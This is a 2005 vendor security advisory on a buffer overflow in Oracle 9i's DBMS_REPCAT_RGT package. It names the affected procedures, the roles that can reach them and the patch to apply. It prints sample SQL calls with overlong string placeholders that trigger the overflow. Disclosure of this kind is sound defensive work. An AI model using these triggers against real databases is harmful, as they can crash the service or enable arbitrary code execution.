Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Buffer Overflow in DBMS_REPCAT_RGT in Oracle 9i
Details Buffer Overflow in DBMS_REPCAT_RGT. This package has EXECUTE permission granted to SYSDBA or EXECUTE_CATALOG_ROLE. Members of these groups can exploit this vulnerability and crash the database or execute arbitrary code. Example SELECT DBMS_REPCAT_RGT.INSTANTIATE_OFFLINE ('longstring', '', '') FROM Dual; SELECT DBMS_REPCAT_RGT.INSTANTIATE_ONLINE ('some_refresh_template_name', '', 'longstring') FROM Dual; BEGIN DBMS_REPCAT_RGT.DROP_SITE_INSTANTIATION ('longstring', '', ''); END; Patch Information Apply the latest Oracle Security patches (e.g. CPU October 2004 or at least alert 68). © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |